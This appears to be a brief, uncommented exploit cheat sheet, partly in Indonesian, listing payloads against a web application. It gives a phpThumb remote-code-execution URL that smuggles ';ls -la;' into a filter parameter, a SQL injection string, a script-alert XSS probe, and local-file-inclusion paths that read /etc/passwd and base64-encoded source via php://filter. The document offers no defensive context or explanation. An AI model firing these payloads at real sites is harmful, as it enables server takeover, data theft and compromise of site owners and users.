1.RCE
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls%20-la;%20&phpThumbDebug=9

2.SQL Injection
parameter di index.php?p=search&keywords=...
  CONTOH : WEB.COM/index.php?search=search&keywords=tes' OR '1'='1

3.Cross Site Scripting (XSS)
WEB.COM/index.php?search=search&keywords=<script>alert(1)</script>

4.Local File Inclusion (LFI)
index.php?p=about
index.php?p=../../../../etc/passwd
index.php?p=php://filter/convert.base64-encode/resource=index.php
